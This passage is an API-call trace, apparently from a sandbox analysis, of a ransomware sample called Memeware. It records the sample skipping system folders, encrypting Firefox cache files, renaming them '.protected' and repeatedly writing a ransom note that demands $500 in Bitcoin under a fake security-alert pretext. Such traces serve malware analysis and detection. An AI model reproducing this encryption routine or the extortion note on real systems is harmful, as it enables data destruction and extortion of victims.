(lpString1=".", lpString2="Windows") returned -1 [0086.182] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.182] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.183] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.183] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.183] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\.") returned 102 [0086.183] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.183] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.183] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.183] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.183] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.183] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.183] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.183] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\..") returned 103 [0086.183] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.183] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.183] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="Windows") returned -1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="Program Files") returned -1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="Program Files (x86)") returned -1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="$Recycle.bin") returned 1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="System Volume Information") returned -1 [0086.183] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01") returned 109 [0086.183] StrStrIW (lpFirst="1D8FDd01", lpSrch=".protected") returned 0x0 [0086.183] lstrcmpW (lpString1="1D8FDd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.183] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.183] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01") returned 109 [0086.184] StrStrW (lpFirst="1D8FDd01", lpSrch=".txt") returned 0x0 [0086.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01") returned 109 [0086.184] StrStrW (lpFirst="1D8FDd01", lpSrch=".rar") returned 0x0 [0086.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01") returned 109 [0086.185] StrStrW (lpFirst="1D8FDd01", lpSrch=".zip") returned 0x0 [0086.185] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.187] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.187] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.187] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.187] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.188] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.188] CloseHandle (hObject=0x160) returned 1 [0086.188] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.protected") returned 119 [0086.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01.protected")) returned 1 [0086.189] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.189] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.189] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\RESTORE_FILES.txt") returned 118 [0086.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.190] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.190] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.191] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.191] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.191] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.191] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.191] CloseHandle (hObject=0x15c) returned 1 [0086.191] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.191] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.191] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\RESTORE_FILES.txt") returned 115 [0086.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.192] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.192] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.193] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.193] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.193] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.193] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.193] CloseHandle (hObject=0x158) returned 1 [0086.194] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.194] lstrcmpiW (lpString1="4", lpString2="Windows") returned -1 [0086.194] lstrcmpiW (lpString1="4", lpString2="Program Files") returned -1 [0086.195] lstrcmpiW (lpString1="4", lpString2="Program Files (x86)") returned -1 [0086.195] lstrcmpiW (lpString1="4", lpString2="$Recycle.bin") returned 1 [0086.195] lstrcmpiW (lpString1="4", lpString2="System Volume Information") returned -1 [0086.195] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4") returned 97 [0086.195] lstrcmpW (lpString1="4", lpString2=".") returned 1 [0086.195] lstrcmpW (lpString1="4", lpString2="..") returned 1 [0086.195] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\*") returned 99 [0086.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.195] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.195] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.195] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.195] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.195] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.195] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\.") returned 99 [0086.195] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.195] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.196] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.196] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.196] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.196] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.196] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.196] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\..") returned 100 [0086.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.196] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.196] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.196] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\RESTORE_FILES.txt") returned 115 [0086.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\4\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.197] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.197] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.197] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.197] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.198] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.198] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.198] CloseHandle (hObject=0x158) returned 1 [0086.198] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.198] lstrcmpiW (lpString1="5", lpString2="Windows") returned -1 [0086.198] lstrcmpiW (lpString1="5", lpString2="Program Files") returned -1 [0086.198] lstrcmpiW (lpString1="5", lpString2="Program Files (x86)") returned -1 [0086.198] lstrcmpiW (lpString1="5", lpString2="$Recycle.bin") returned 1 [0086.198] lstrcmpiW (lpString1="5", lpString2="System Volume Information") returned -1 [0086.198] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5") returned 97 [0086.198] lstrcmpW (lpString1="5", lpString2=".") returned 1 [0086.198] lstrcmpW (lpString1="5", lpString2="..") returned 1 [0086.198] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\*") returned 99 [0086.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.199] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.199] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.199] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.199] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\.") returned 99 [0086.199] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.199] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.199] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.199] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\..") returned 100 [0086.199] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.199] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.199] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.199] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\RESTORE_FILES.txt") returned 115 [0086.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\5\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.200] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and 